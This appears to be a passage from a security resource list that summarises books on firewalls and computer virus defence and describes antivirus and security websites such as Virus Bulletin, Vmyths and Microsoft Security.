If you've been using the Internet for any length of time, you've probably received some unsavoury and unsolicited e-mail. If you run a business, you may be worried about the security of your data and your customers' privacy. At home, you want to protect your personal information from identity thieves and other shady characters. Firewalls For Dummies will give you the low-down on firewalls, then guide you through choosing, installing, and configuring one for your personal or business network.

Firewalls For Dummies helps you understand what firewalls are, how they operate on different types of networks, what they can and can't do, and how to pick a good one. You will find out about developing security policies, establishing rules for simple protocols, detecting and responding to system intrusions, setting up firewalls for SOHO or personal use, creating demilitarised zones, using Windows or Linux as a firewall, configuring ZoneAlarm, BlackICE, and Norton personal firewalls, and installing and using ISA Server and FireWall-1.

With the handy tips and hints this book provides, you will find that firewalls are nothing to fear, unless you're a cyber-crook! You will soon be able to keep your data safer, protect your family's privacy, and probably sleep better, too.

Absolute  Beginner’s  Guide  To 
Personal  Firewalls 


Authors:  Jerry  Ford,  Stephen  Dodd 
Publisher:  Que 

A consumer-level firewall guide committed to teaching how to choose the right firewall software, set up a personal firewall, and test computer security. Personal firewall security is particularly useful for the ever-increasing number of users with 'always on' Internet connections such as those with a cable modem or DSL connection.

Previous firewall books have focused on network professionals and network firewall protection, and have not adequately addressed the consumer's need for personal firewall protection. This book is designed to provide simplified, yet thorough firewall information on the most prevalent personal firewall software applications available for the non-expert firewall consumer.

This book will walk readers through the basics such as determining the need for a firewall and testing current security. Other chapters will demonstrate and explain: how to tighten security, choose a high-speed Internet connection, install a personal firewall, and test new security.

Firewalls:  The  Complete  Reference 


Authors: Keith Strassberg, Gary Rollie, Richard Gondek
Publisher: McGraw-Hill Osborne Media

Get in-depth, objective advice on installing and configuring today's most popular firewalls including Check Point FireWall-1 4.1 and NG, Cisco PIX, Microsoft ISA Server, NetScreen, SonicWall and Symantec, and learn strategies for successful network design and firewall placement. Gain insight into common methods for attacking firewalls, including software bugs, viruses, and misconfigurations.

Learn firewall best practices and how to improve the overall security of your firewall installation. This multi-purpose guide contains all the implementation and administration information you need to keep your network safe from unauthorised access.

Learn to restrict access to your network without compromising usability and functionality. Understand the strengths and limitations of firewall technology with the in-depth explanations of network and port address translation, VPNs, authentication, virus protection, content filtering, and more. Learn about the various architectures available today: application and circuit-level gateways, packet filters, and stateful packet inspection engines.

Find out how hackers commonly go about breaking into a network. Manage your firewall installation using inbuilt tools, objects, and services, and supplement it by implementing human controls such as education and log monitoring.
The Art of Computer Virus Research And Defense

Author: Peter Szor
Publisher: Addison-Wesley Professional

Symantec's chief antivirus researcher has written the definitive guide to contemporary virus threats, defence techniques, and analysis tools. Unlike most books on computer viruses, The Art of Computer Virus Research and Defense is a reference written strictly for white hats: IT and security professionals responsible for protecting their organisations against malware. Peter Szor systematically covers everything you need to know, including virus behaviour and classification, protection strategies, antivirus and worm-blocking techniques, and much more.

Szor  presents  the  state-of-the-art  in  both  malware  and  protec- 
tion, providing  the  full  technical  detail  that  professionals  need  to 
handle  increasingly  complex  attacks.  Along  the  way,  he  provides 
extensive  information  on  code  metamorphism  and  other  emerging 
techniques,  so  you  can  anticipate  and  prepare  for  future  threats. 

Szor also offers the most thorough and practical primer on virus analysis ever published, addressing everything from creating your own personal laboratory to automating the analysis process. This book's coverage includes discovering how malicious code attacks a variety of platforms; classifying malware strategies for infection, in-memory operation, self-protection, payload delivery, exploitation, and more; identifying and responding to code obfuscation threats (encrypted, polymorphic, and metamorphic); mastering empirical methods for analysing malicious code, and what to do with what you learn; and reverse-engineering malicious code with disassemblers, debuggers, emulators, and virtual machines.

The book teaches you how to implement technical defences such as scanning, code emulation, disinfection, inoculation, integrity checking, behaviour blocking, worm blocking, host-based intrusion prevention, and network-level defence strategies.

Web  sites 

Virus  Bulletin 

www.virusbtn.com 

Virus  Bulletin  started  in  1989  as  a magazine  dedicated  to  providing 
PC  users  with  a regular  source  of  intelligence  about  computer 
viruses,  their  prevention,  detection  and  removal,  and  how  to 
recover  programs  and  data  following  an  attack. 

Editorial  independence  has  always  been  Virus  Bulletin’s  prime 
concern.  From  the  very  first  issue,  Virus  Bulletin  has  cut  through 
antivirus  hype  and  remained  uninfluenced  by  sales  pitches  and 
marketing  babble.  The  aim  of  the  magazine  is  to  arm  users  with 
all  the  information  they  need  to  stay  current  with  the  latest  devel- 
opments in  the  antivirus  field. 
Symantec Worldwide Home Page

www.symantec.com

The premier site for most people who get hit by a new worm! Symantec is not merely the home of one of the world's most widely used antivirus solutions; it is also considered a Mecca for people who want to follow up on the latest developments in the antivirus industry.

Vmyths 

www.vmyths.com

The term 'computer virus' can be quite scary for some people, and those who don't know much about it can be led to believe anything. That's where Vmyths comes in.


Vmyths  helps  you  learn  about  computer  virus  myths,  hoaxes, 
urban  legends,  hysteria,  and  the  implications  if  you  believe  in 
them.  You  can  also  search  a list  of  computer  virus  hoaxes  and  virus 
hysteria  to  broaden  your  knowledge  about  the  truth  behind  the 
scare.  Vmyths  stays  independent  from  any  antivirus  companies 
and  claims  to  speak  of  the  truth  rather  than  what  the  antivirus 
companies  want  you  to  believe. 

Microsoft  Security 

www.microsoft.com/security 

For the latest information on security fixes, updates and patches for Windows and other Microsoft products, this site is the place to be. Along with security updates, Microsoft Security provides news and information on recent developments in the field, and also contains guides on keeping your PC more secure.
[Screenshot of www.microsoft.com/security, showing links for Spyware (a new anti-spyware solution, beta download), Current Security Updates (information on the latest software security updates), Trustworthy Computing, and Recent Incidents (how to help protect your PC against viruses, hackers, and other security issues).]